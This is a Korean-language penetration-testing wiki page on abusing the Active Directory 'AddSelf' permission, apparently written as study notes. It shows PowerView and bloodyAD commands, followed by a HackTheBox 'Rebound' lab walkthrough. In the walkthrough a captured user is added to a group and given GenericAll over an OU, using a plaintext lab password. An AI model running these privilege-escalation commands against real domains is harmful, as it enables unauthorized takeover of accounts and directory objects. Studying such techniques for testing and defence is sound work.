AddSelf

PreviousForceChangePassword NextWriteOwner

Last updated 5 months ago

Was this helpful?

AddSelf

AddSelf는 자신을 특정 그룹에 추가할 때 스스로의 권한으로 위임할 수 있는 권한입니다.

# AddSelf 권한이 있는 사용자 자격증명을 객체로 저장
$SecPassword = ConvertTo-SecureString '<PASS>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<Domain>\<USER>', $SecPassword)

# 저장한 객체정보를 권한이 있는 그룹에 위임
Add-DomainGroupMember -Identity '<Group>' -Members '<USER>' -Credential $Cred

# 그룹의 멤버를 확인하여 정상적으로 위임이 되었는지 확인
Get-DomainGroupMember -Identity '<Group>'

bloodyAD.py -u <USER> -p <PASS> -d <Domain> --host <IP> add groupMember <Group> <USER>

Practice

실습 환경에서 장악한 oorend 사용자는 servicemgmt 그룹에 AddSelf 권한이 있습니다.

oorend 계정으로 파워쉘을 획득할 수 있는 경로는 없었기 때문에

bloodyAD를 이용하여 ServiceMgmt 그룹에 멤버쉽을 위임하는 실습을 진행합니다.

# ServiceMgmt 그룹에 oorend 사용자를 추가
┌──(root㉿kali)-[~/Pentest/Machine/bloodyAD]
└─# python3 bloodyAD.py -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.10.11.231 add groupMember ServiceMgmt oorend                        
[+] oorend added to ServiceMgmt

# oorend 사용자에 Service User OU에대한 GenericAll 권한 위임                                                                                                                                        
┌──(root㉿kali)-[~/Pentest/Machine/bloodyAD]
└─# python3 bloodyAD.py -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.10.11.231 add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' oorend
[+] oorend has now GenericAll on OU=SERVICE USERS,DC=REBOUND,DC=HTB

실습에서 따로 oorend 사용자에게 Service User OU에 대해서 GenericAll 권한을 준 이유는

상속 과정에서 그룹의 권한 중 OU에 대한 GenericAll 권한이 위임되지 않을 수도 있기 때문입니다.

References